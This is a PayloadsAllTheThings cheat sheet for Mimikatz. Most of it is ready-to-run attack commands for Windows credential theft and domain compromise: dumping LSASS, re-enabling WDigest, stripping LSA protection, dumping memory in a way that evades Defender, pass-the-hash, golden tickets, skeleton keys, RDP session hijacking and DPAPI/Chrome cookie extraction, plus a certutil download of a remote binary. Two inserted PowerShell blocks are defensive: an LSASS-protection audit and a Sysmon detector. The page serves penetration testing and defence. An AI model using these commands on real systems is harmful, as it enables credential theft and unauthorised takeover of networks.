PayloadsAllTheThings/Methodology and Resources/Windows - Mimikatz.md
# Windows - Mimikatz
## Summary

* [Execute commands](#execute-commands)
* [Extract passwords](#extract-passwords)
* [LSA Protection Workaround](#lsa-protection-workaround)
* [Mini Dump](#mini-dump)
* [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key)
* [RDP Session Takeover](#rdp-session-takeover)
* [RDP Passwords](#rdp-passwords)
* [Credential Manager & DPAPI](#credential-manager--dpapi)
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
* [Commands list](#commands-list)
* [Powershell version](#powershell-version)
* [References](#references)

![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)

## Execute commands
Only one command:

```powershell
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
```

Mimikatz console (multiple commands):

```powershell
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
```

## Extract passwords
> Microsoft disabled clear-text password storage in lsass from Windows 8.1 / 2012 R2 onwards. The change was backported (KB2871997) to Win7 / 8 / 2008R2 / 2012 as a registry switch, but on those versions clear-text storage is still enabled by default.

```powershell
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
```

:warning: For the change to take effect, the following conditions apply:

- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
  * Adding requires lock
  * Removing requires signout
- Win10:
  * Adding requires signout
  * Removing requires signout
- Win2016:
  * Adding requires lock
  * Removing requires reboot

## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL)

```powershell
# Check whether LSA runs as a protected process: the value "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
# Next, upload mimidriver.sys from the official mimikatz repo to the same folder as mimikatz.exe
# Now load mimidriver.sys into the system
mimikatz # !+
# Now remove the protection flags from the lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
# Finally run the logonpasswords function to dump lsass
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
# Now re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
# Unload the service created
mimikatz # !-

# https://github.com/itm4n/PPLdump
PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
```

- LSA is running as a virtualized process (LSAISO) by **Credential Guard**

```powershell
# Check whether a process called lsaiso.exe exists among the running processes
tasklist |findstr lsaiso
# Inject our own malicious Security Support Provider into memory
# requires mimilib.dll in the same folder
mimikatz # misc::memssp
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
```

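The two sections above (WDigest caching, RunAsPPL and Credential Guard) each come down to one host setting; the following is an added PowerShell audit, not code from this page or from mimikatz, that reads those settings and reports which sekurlsa paths are still open. It assumes an elevated session and uses only the registry values and the `lsaiso.exe` indicator named above.

```powershell
# Added example, not code from the PayloadsAllTheThings page: audit the three
# LSASS protections this section walks through and report what a local admin
# could still read from lsass memory. Run from an elevated PowerShell session.
function Get-LsassCredentialExposure {
    $wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $lsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # 1. WDigest: UseLogonCredential=1 makes LSASS keep clear-text passwords.
    #    A missing value means "off" on 8.1/2012R2+, but "on" on 7/8/2008R2/2012,
    #    where KB2871997 only added the switch and left the default enabled.
    $useLogonCred = (Get-ItemProperty -Path $wdigestKey -Name UseLogonCredential `
                        -ErrorAction SilentlyContinue).UseLogonCredential
    $osVersion = [version](Get-CimInstance Win32_OperatingSystem).Version
    $legacyDefaultOn = $osVersion -lt [version]'6.3'
    $wdigestClearText = if ($null -eq $useLogonCred) { $legacyDefaultOn } else { $useLogonCred -eq 1 }

    # 2. RunAsPPL: 1 (UEFI-locked) or 2 (not locked) marks LSASS as a protected
    #    process. The section above shows it being stripped with mimidriver.sys,
    #    so treat PPL as necessary but not sufficient: loading of such drivers
    #    must be blocked too (e.g. HVCI or a driver block list).
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL `
                    -ErrorAction SilentlyContinue).RunAsPPL
    $lsassIsPpl = $runAsPpl -in @(1, 2)

    # 3. Credential Guard: secrets are held by LsaIso.exe in VTL1, the same
    #    indicator the section checks with "tasklist | findstr lsaiso".
    $credGuard = $null -ne (Get-Process -Name lsaiso -ErrorAction SilentlyContinue)

    $findings = @()
    if ($wdigestClearText) { $findings += 'WDigest clear-text caching on: sekurlsa::wdigest returns passwords' }
    if (-not $lsassIsPpl)  { $findings += 'LSASS not PPL: sekurlsa::logonpasswords needs only SeDebugPrivilege' }
    if (-not $credGuard)   { $findings += 'No Credential Guard: NTLM hashes and Kerberos keys readable from lsass memory' }

    [pscustomobject]@{
        OSVersion         = $osVersion.ToString()
        WDigestClearText  = $wdigestClearText
        LsassRunAsPPL     = $lsassIsPpl
        CredentialGuardOn = $credGuard
        Findings          = $findings
    }
}

Get-LsassCredentialExposure | Format-List
```

An empty `Findings` list means all three controls are in place; a non-empty one names the exact mimikatz module that would still succeed on the host.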
## Mini Dump
Dump the lsass process with `procdump`

> Windows Defender is triggered when a memory dump of lsass is taken, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) instead of its name "bypasses" that.

```powershell
# HTTP method - using the default way
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# SMB method - using the pid
net use Z: https://live.sysinternals.com
tasklist /fi "imagename eq lsass.exe" # Find lsass's pid
Z:\procdump.exe -accepteula -ma $lsass_pid lsass.dmp
```

Dump the lsass process with `rundll32`

```powershell
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full
```

Use the minidump:

* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`

```powershell
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords
```

* Pypykatz: `pypykatz lsa minidump lsass.dmp`

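Whichever of the dump methods above is used, the dumping process has to open lsass.exe with memory-read rights, and Sysmon Event ID 10 records that open. The block below is an added PowerShell example (not from this page or from mimikatz) that flags such opens; the allow-list, the constructed sample records and their access masks are assumptions for the demo.

```powershell
# Added example, not code from the PayloadsAllTheThings page: every dump
# method above (procdump -ma, comsvcs MiniDump, sekurlsa::*) must open a
# handle to lsass.exe with PROCESS_VM_READ (0x10). Sysmon Event ID 10
# (ProcessAccess) records SourceImage, TargetImage and GrantedAccess for
# each such open; this flags the ones a defender should look at.
$ProcessVmRead = 0x10

# Images that legitimately read LSASS memory on this host (assumed list;
# replace it with what the deployed AV/EDR actually uses).
$AllowedSources = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe'
)

function Test-LsassReadAccess {
    param([string]$SourceImage, [string]$TargetImage, [string]$GrantedAccess)
    if ($TargetImage -notmatch '\\lsass\.exe$') { return $null }
    $mask = [Convert]::ToInt32($GrantedAccess, 16)          # Sysmon writes e.g. "0x1FFFFF"
    if (($mask -band $ProcessVmRead) -eq 0) { return $null } # no memory read requested
    if ($AllowedSources -contains $SourceImage) { return $null }
    $note = if ($mask -eq 0x1FFFFF) { 'PROCESS_ALL_ACCESS (full dump tools)' } else { 'VM_READ present (targeted reads)' }
    [pscustomobject]@{ Source = $SourceImage; Access = ('0x{0:X}' -f $mask); Note = $note }
}

# Constructed sample records in the shape Sysmon emits (not real telemetry).
$samples = @(
    @{ SourceImage = 'C:\Users\Public\procdump.exe';     TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1FFFFF' },
    @{ SourceImage = 'C:\Windows\System32\rundll32.exe'; TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1FFFFF' },
    @{ SourceImage = 'C:\temp\mimikatz\mimikatz.exe';    TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1010' },
    @{ SourceImage = 'C:\Windows\System32\svchost.exe';  TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1000' },
    @{ SourceImage = 'C:\Windows\System32\notepad.exe';  TargetImage = 'C:\Windows\System32\notepad.exe'; GrantedAccess = '0x1FFFFF' }
)
# Expected: procdump, rundll32 and mimikatz are reported; svchost (allow-listed,
# and 0x1000 carries no VM_READ anyway) and the notepad self-open are not.
$samples | ForEach-Object { Test-LsassReadAccess @_ } | Format-Table -AutoSize

# Live use: feed real Sysmon events through the same function.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } |
#   ForEach-Object {
#       $d = @{}
#       ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#       Test-LsassReadAccess -SourceImage $d.SourceImage -TargetImage $d.TargetImage -GrantedAccess $d.GrantedAccess
#   }
```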
## Pass The Hash
```powershell
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
```

## Golden ticket

```powershell
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
```

```powershell
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```

## Skeleton key

```powershell
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```

## RDP Session Takeover

Use `ts::multirdp` to patch the RDP service to allow more than two users.

* Enable privileges

```powershell
privilege::debug
token::elevate
```

* List RDP sessions

```powershell
ts::sessions
```

* Hijack session

```powershell
ts::remote /id:2
```

Running `tscon.exe` as the SYSTEM user lets you connect to any session without a password.

```powershell
# get the Session ID you want to hijack
query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```

## RDP Passwords
Verify if the service is running:
```ps1
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
```
* Extract passwords manually
```ps1
procdump64.exe -ma 988 -accepteula C:\svchost.dmp
strings -el svchost* | grep Password123 -C3
```
* Extract passwords using Mimikatz
```ps1
privilege::debug
ts::logonpasswords
```

## Credential Manager & DPAPI

```powershell
# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
# check the file with mimikatz
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
# find master key
$ mimikatz !sekurlsa::dpapi
# use master key
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
```

### Chrome Cookies & Credential
```powershell
# Saved Cookies
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b
# Saved Credential in Chrome
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
```

### Task Scheduled credentials

```powershell
mimikatz(commandline) # vault::cred /patch
TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / <NULL>
UserName : DOMAIN\user
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00004004
Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Attributes : 0
```

### Vault

```powershell
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\
```

## Commands list

| Command | Definition |
|:----------------:|:---------------|
| CRYPTO::Certificates | list/export certificates |
| KERBEROS::Golden | create golden/silver/trust tickets |
| KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user's tickets. Similar in functionality to `klist`. |
| KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). |
| LSADUMP::DCSync | ask a DC to synchronize an object (get password data for an account). No need to run code on the DC. |
| LSADUMP::LSA | ask the LSA server to retrieve SAM/AD enterprise credentials (normal, patch on the fly or inject). Used to dump all Active Directory domain credentials from a Domain Controller or an lsass.dmp dump file. Also used to get a specific account's credential such as krbtgt with the parameter `/name:krbtgt`. |
| LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. |
| LSADUMP::Trust | ask the LSA server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). |
| MISC::AddSid | add to the SIDHistory of a user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID::modify as of May 6th, 2016. |
| MISC::MemSSP | inject a malicious Windows SSP to log locally authenticated credentials. |
| MISC::Skeleton | inject a Skeleton Key into the LSASS process on a Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a "master password" (aka Skeleton Key) as well as their usual password. |
| PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands). |
| SEKURLSA::Ekeys | list Kerberos encryption keys |
| SEKURLSA::Kerberos | list Kerberos credentials for all authenticated users (including services and the computer account) |
| SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT) password data |
| SEKURLSA::LogonPasswords | list all available provider credentials. This usually shows recently logged-on user and computer credentials. |
| SEKURLSA::Pth | Pass-the-Hash and Over-Pass-the-Hash |
| SEKURLSA::Tickets | list all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer's AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users). |
| TOKEN::List | list all tokens of the system |
| TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box |
| TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials. |

## Powershell version

Mimikatz in memory (no binary on disk) with:

- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit

More information can be grabbed from memory with:

- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)

## References

- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)